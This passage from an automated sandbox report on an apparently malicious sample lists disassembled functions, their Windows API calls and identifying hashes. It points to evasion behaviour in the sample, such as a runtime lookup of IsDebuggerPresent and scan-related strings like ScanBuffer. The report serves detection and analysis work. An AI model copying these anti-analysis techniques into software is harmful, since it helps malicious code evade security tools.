                      • Instruction Fuzzy Hash: EBF0967C644304AFFB41EFB8DC62D5EBBADF7497007554520FA00D3610EA74AD109A26
                      Function 028AEFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(KernelBase,?,028AF3CC,UacInitialize,028F237C,028BB40C,UacScan,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString), ref: 028AEFCE
                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 028AEFE0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: IsDebuggerPresent$KernelBase
                      • API String ID: 1646373207-2367923768
                      • Opcode ID: 97c49e4b975b41d28026f4cc1005f4e0a8be0a04d01da3abca0ede6bdf2ac2cf
                      • Instruction ID: d804f76521309bed5e8e4e022684475eb84db54ac452410cea6167e4bfa11bdc
                      • Opcode Fuzzy Hash: 97c49e4b975b41d28026f4cc1005f4e0a8be0a04d01da3abca0ede6bdf2ac2cf
                      • Instruction Fuzzy Hash: F9D0127E3553701DBD0036F81CD581D024CCA555697240E70B126D55D3FEAB88511115
                      Function 0289C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,028BD10B,00000000,028BD11E), ref: 0289C3FA
                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0289C40B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                      • API String ID: 1646373207-3712701948
                      • Opcode ID: 6b9e82ce3f8b56fdd2f0a2a89870af1edfe2e7119be560244c5742d5a55e5c5b
                      • Instruction ID: c551bb9addbff32a6a6e93fab2e3d52683af30e92e80a92d710ef1867a13caa5
                      • Opcode Fuzzy Hash: 6b9e82ce3f8b56fdd2f0a2a89870af1edfe2e7119be560244c5742d5a55e5c5b
                      • Instruction Fuzzy Hash: 89D05EBCB807104EFF026BB5688167A2788970E346B88D82AE005D5242E7AA44144F51
                      Function 0289E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0289E217
                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0289E233
                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0289E2AA
                      • VariantClear.OLEAUT32(?), ref: 0289E2D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: ArraySafe$Bound$ClearIndexVariant
                      • String ID:
                      • API String ID: 920484758-0
                      • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                      • Instruction ID: e04b1a8c18c5c8176a5af118a0cfdca3ec040ff0a21466f92985d2f216c65829
                      • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                      • Instruction Fuzzy Hash: 2F41FA7DA002199BCF61EB5CCD90BD9B7BDAB49204F0441D6EA4DE7211DA34AF808F55
                      Function 0289ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                      Download Yara Rule
                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0289ACD9
                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0289ACFD
                      • GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 0289AD18
                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0289ADAE
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileModuleName$LoadQueryStringVirtual
                      • String ID:
                      • API String ID: 3990497365-0
                      • Opcode ID: af4601b4d0a7aaf530a9bc507f569643e08058f20f528d2b9bca8b995320656c
                      • Instruction ID: 5d62edce7a1f260d541b9f332616f14557232553f313bf849c6670aab9404c6e
                      • Opcode Fuzzy Hash: af4601b4d0a7aaf530a9bc507f569643e08058f20f528d2b9bca8b995320656c
                      • Instruction Fuzzy Hash: A9410B7CA402589BDF21DB6CCC84BDAB7FDAB08345F0840E5A648E7241DB74AF888F51
                      Function 0289ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                      Download Yara Rule
                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0289ACD9
                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0289ACFD
                      • GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 0289AD18
                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0289ADAE
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileModuleName$LoadQueryStringVirtual
                      • String ID:
                      • API String ID: 3990497365-0
                      • Opcode ID: ff1e9cc640b56299abc0f1015c6f8a0319f6cf1d7a8f732e69f8f2ba90ed2eed
                      • Instruction ID: bcf4f2dc7d85e397340b429173dc24dd1927a3e2714bf335daede5fc326bf021
                      • Opcode Fuzzy Hash: ff1e9cc640b56299abc0f1015c6f8a0319f6cf1d7a8f732e69f8f2ba90ed2eed
                      • Instruction Fuzzy Hash: 67410D7CA402589BDF21DB6CCC84BDAB7EDAB08345F0840E5A648E7251DB74AF888F51
                      Function 02891C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6ef7b771a3717eb4ecf479238b73ef135969e1738e2a06a2b5d243e5db291318
                      • Instruction ID: 5e65be69963d748dc101b528ffb75af951ae095bfa5500843adc1636c2fdb29e
                      • Opcode Fuzzy Hash: 6ef7b771a3717eb4ecf479238b73ef135969e1738e2a06a2b5d243e5db291318
                      • Instruction Fuzzy Hash: 27A1157E7182060BDF19AA7C9C883ADB3C69BC4325F1C827EE11DCB785EB68C9518751
                      Function 0289946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0289955A), ref: 028994F2
                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0289955A), ref: 028994F8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: DateFormatLocaleThread
                      • String ID: yyyy
                      • API String ID: 3303714858-3145165042
                      • Opcode ID: 9294ed8c11f868a3442f5d62f1850abbe24f87addad35cd621202bf92913d2bf
                      • Instruction ID: ba049f3bc42aa3b26b8f7bfd5d427e2e643c4586f50ac4e15768deefefdc4a59
                      • Opcode Fuzzy Hash: 9294ed8c11f868a3442f5d62f1850abbe24f87addad35cd621202bf92913d2bf
                      • Instruction Fuzzy Hash: 4321717DA002189FDF11DFA8C851AAEB3F9EF09710F4940A9E949E7250D774DE40CB66
                      Function 028AAD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AAD90
                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 028AADC0
                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 028AADDF
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AADEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Read$Write
                      • String ID:
                      • API String ID: 3448952669-0
                      • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                      • Instruction ID: e9110f0f27bc6a6b067c6a51e5f89a662f743a47c1601bfa84b134b3bd913c2f
                      • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                      • Instruction Fuzzy Hash: 3E219DBD6412199FEF14DF29CC80BAE73B9EF40365F048115EE94D7680EB38E911DAA0